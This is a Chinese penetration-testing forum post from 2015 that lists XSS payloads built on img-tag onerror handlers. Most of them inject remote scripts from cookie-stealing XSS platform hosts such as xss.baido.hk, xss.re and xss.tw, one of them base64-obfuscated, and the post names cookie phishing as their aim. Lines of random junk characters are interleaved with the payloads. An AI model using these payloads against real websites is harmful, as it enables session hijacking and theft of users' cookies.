中国网络渗透测试联盟

标题: img标签的常用几种测试手段 [打印本页]

作者: admin    时间: 2015-10-18 14:33
标题: img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
& {4 Y; J! J: A% E- R! p# D<img src=# onerror=alert(123)>, M$ }5 b$ @: [! w( Y" H: J
<img src=# onerror=alert(document.cookie)>: i9 p2 \2 x" |& B0 \
下面是利用平台钓cookie的3 a. ~8 R$ S% |. T8 h: M4 t
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>- b& I: w0 p7 G4 ]8 H0 E8 K3 P& {
+ }# f" k! r9 ?( d5 n% e! @' n7 O

1 C0 m+ ]+ @4 V* f<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>+ |* D' ~+ }5 I# C' @* P
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
2 E# y/ d+ w, K6 i$ H( U“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
" o) a* s* Q; l2 d<img src=1 onerror=jQuery.getScript("//xss.re/974")>
3 n- ~# D# S+ O/ T<img src="#">
* g* u) ?: C$ Z) k<img src="#">
" G4 o7 S% d8 k5 G; ~6 x$ R# ^# F<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
$ S1 e6 r1 d( v: k8 L% \<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
! ~4 c. E1 T0 [4 E<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))># N7 I0 y, o+ m9 k" D  R: @. B
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
5 k( R5 Q. J* Z5 Q<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>* f& F: a! @1 C8 I% `
<img src=x width="0" height="0"></img>
) X) Q% P0 f1 B) p9 U; Q$ S<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>/ o4 j6 k1 _  ^
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>0 ~1 m  {/ L% R/ m





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2